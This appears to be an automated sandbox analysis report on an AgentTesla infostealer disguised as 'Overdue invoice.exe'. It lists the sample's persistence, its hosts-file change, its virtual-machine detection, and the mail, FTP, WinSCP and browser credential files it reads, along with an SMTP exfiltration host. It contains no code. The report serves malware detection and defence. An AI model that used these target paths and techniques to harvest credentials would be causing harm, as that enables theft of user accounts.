                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Modifies the hosts file
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 16.2.yqWDN.exe.3de2e78.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.yqWDN.exe.3de2e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.yqWDN.exe.3e72e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.yqWDN.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.Overdue invoice.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Overdue invoice.exe.3ac2e78.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.yqWDN.exe.3e72e78.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.yqWDN.exe.3d8e3f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.yqWDN.exe.3cfe3f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Overdue invoice.exe.3ac2e78.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Overdue invoice.exe.39de3f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.295945880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000000.366994504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.295465407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.294210578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.378013888.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000000.365073156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000000.365965578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.519516875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.373874318.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Overdue invoice.exe PID: 6504, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Overdue invoice.exe PID: 7140, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 5496, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 7048, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 5572, type: MEMORYSTR
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\Overdue invoice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: Yara matchFile source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Overdue invoice.exe PID: 7140, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 5572, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 16.2.yqWDN.exe.3de2e78.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.yqWDN.exe.3de2e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.yqWDN.exe.3e72e78.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.yqWDN.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.Overdue invoice.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.0.yqWDN.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Overdue invoice.exe.3ac2e78.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.Overdue invoice.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.yqWDN.exe.3e72e78.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.yqWDN.exe.3d8e3f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.yqWDN.exe.3cfe3f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Overdue invoice.exe.3ac2e78.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Overdue invoice.exe.39de3f8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.295945880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000000.366994504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.295465407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.294210578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.378013888.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000000.365073156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000000.365965578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.519516875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.373874318.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Overdue invoice.exe PID: 6504, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Overdue invoice.exe PID: 7140, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 5496, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 7048, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: yqWDN.exe PID: 5572, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		111
                    Process Injection                    		1
                    File and Directory Permissions Modification                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		Exfiltration Over Other Network Medium1
                    Encrypted Channel                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Scheduled Task/Job                    		1
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		1
                    Disable or Modify Tools                    		1
                    Input Capture                    		114
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		Exfiltration Over Bluetooth1
                    Non-Standard Port                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)1
                    Registry Run Keys / Startup Folder                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Credentials in Registry                    		1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		Automated Exfiltration1
                    Non-Application Layer Protocol                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                    Obfuscated Files or Information                    		NTDS311
                    Security Software Discovery                    		Distributed Component Object Model1
                    Input Capture                    		Scheduled Transfer11
                    Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
                    Software Packing                    		LSA Secrets1
                    Process Discovery                    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Masquerading                    		Cached Domain Credentials131
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items131
                    Virtualization/Sandbox Evasion                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job111
                    Process Injection                    		Proc Filesystem1
                    Remote System Discovery                    		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                    Hidden Files and Directories                    		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 635084 Sample: Overdue invoice.exe Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 49 Snort IDS alert for network traffic 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 12 other signatures 2->55 7 Overdue invoice.exe 6 2->7         started        11 yqWDN.exe 5 2->11         started        14 yqWDN.exe 2 2->14         started        process3 dnsIp4 39 C:\Users\user\AppData\...\dYXeRswtYBrq.exe, PE32 7->39 dropped 41 C:\Users\user\AppData\Local\...\tmpA306.tmp, XML 7->41 dropped 43 C:\Users\user\...\Overdue invoice.exe.log, ASCII 7->43 dropped 69 Injects a PE file into a foreign processes 7->69 16 Overdue invoice.exe 2 5 7->16         started        21 schtasks.exe 1 7->21         started        23 Overdue invoice.exe 7->23         started        47 192.168.2.1 unknown unknown 11->47 71 Multi AV Scanner detection for dropped file 11->71 73 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 11->73 75 Machine Learning detection for dropped file 11->75 77 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 11->77 25 yqWDN.exe 2 11->25         started        27 schtasks.exe 1 11->27         started        file5 signatures6 process7 dnsIp8 45 mail.jkudyog.com 206.183.111.188, 49715, 49745, 587 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN United States 16->45 33 C:\Users\user\AppData\Roaming\...\yqWDN.exe, PE32 16->33 dropped 35 C:\Windows\System32\drivers\etc\hosts, ASCII 16->35 dropped 37 C:\Users\user\...\yqWDN.exe:Zone.Identifier, ASCII 16->37 dropped 57 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->57 59 Tries to steal Mail credentials (via file / registry access) 16->59 61 Modifies the hosts file 16->61 63 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->63 29 conhost.exe 21->29         started        65 Tries to harvest and steal ftp login credentials 25->65 67 Tries to harvest and steal browser information (history, passwords, etc) 25->67 31 conhost.exe 27->31         started        file9 signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Overdue invoice.exe61%VirustotalBrowse
                    Overdue invoice.exe60%ReversingLabsByteCode-MSIL.Trojan.RealProtect
                    Overdue invoice.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exe60%ReversingLabsByteCode-MSIL.Trojan.RealProtect
                    C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe60%ReversingLabsByteCode-MSIL.Trojan.RealProtect

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    19.0.yqWDN.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                    19.0.yqWDN.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                    7.0.Overdue invoice.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                    7.0.Overdue invoice.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                    7.0.Overdue invoice.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                    19.0.yqWDN.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    19.2.yqWDN.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    19.0.yqWDN.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                    7.2.Overdue invoice.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    7.0.Overdue invoice.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                    19.0.yqWDN.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                    7.0.Overdue invoice.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File

                    Domains

                    SourceDetectionScannerLabelLink
                    mail.jkudyog.com1%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn//:0%Avira URL Cloudsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.fontbureau.comepko0%URL Reputationsafe
                    http://www.fontbureau.comessed0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://mail.jkudyog.com0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cnoO0%Avira URL Cloudsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    https://I323GyXsTwT8KsWsK7L.net1-5-21-3853321935-212556320%Avira URL Cloudsafe
                    http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                    http://www.fonts.comn0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.urwpp.depA0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/l0%Avira URL Cloudsafe
                    http://www.fontbureau.comttoF0%Avira URL Cloudsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.de0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.fontbureau.com=0%Avira URL Cloudsafe
                    http://www.sandoll.co.kr=0%Avira URL Cloudsafe
                    http://www.fontbureau.comlicF0%URL Reputationsafe
                    https://I323GyXsTwT8KsWsK7L.net80%Avira URL Cloudsafe
                    http://www.agfamonotype.0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                    http://www.founder.com.cn/cnt-ia0%Avira URL Cloudsafe
                    http://www.fontbureau.comoGC0%Avira URL Cloudsafe
                    http://www.fontbureau.comdc0%Avira URL Cloudsafe
                    http://dWZLeu.com0%Avira URL Cloudsafe
                    http://www.sandoll.co.kr$A0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cnz0%URL Reputationsafe
                    http://www.fontbureau.comd0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.sandoll.co.krF10%Avira URL Cloudsafe
                    http://www.fontbureau.comB.TTFlC0%Avira URL Cloudsafe
                    https://I323GyXsTwT8KsWsK7L.net0%Avira URL Cloudsafe
                    http://www.fontbureau.comm0%URL Reputationsafe
                    http://www.founder.com.cn/cne-d0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.fontbureau.como0%URL Reputationsafe
                    http://www.fontbureau.comals0%URL Reputationsafe
                    http://www.tiro.comh0%URL Reputationsafe
                    http://www.tiro.comc0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.jkudyog.com
                    		206.183.111.188
                    		truetrueunknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1Overdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://www.fontbureau.com/designersGOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers/?Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/bTheOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers?Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/3COverdue invoice.exe, 00000000.00000003.259988892.0000000005908000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn//:Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
